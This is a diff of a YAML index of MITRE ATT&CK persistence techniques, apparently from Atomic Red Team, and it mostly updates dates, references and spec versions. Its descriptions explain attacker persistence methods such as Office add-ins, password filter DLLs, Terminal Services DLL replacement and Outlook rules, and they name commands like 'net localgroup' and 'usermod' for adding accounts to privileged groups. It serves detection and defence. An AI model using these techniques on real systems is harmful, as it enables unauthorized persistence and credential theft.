-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -29097,13 +29443,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -29111,11 +29462,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -29146,7 +29520,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29184,13 +29558,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29216,7 +29588,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -29258,7 +29630,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -29336,11 +29707,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29420,35 +29790,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29472,71 +29817,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29545,24 +29879,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29654,8 +30020,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29686,71 +30052,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29781,7 +30215,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29836,13 +30270,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29903,9 +30335,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29914,7 +30346,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -29967,7 +30398,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29988,12 +30419,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
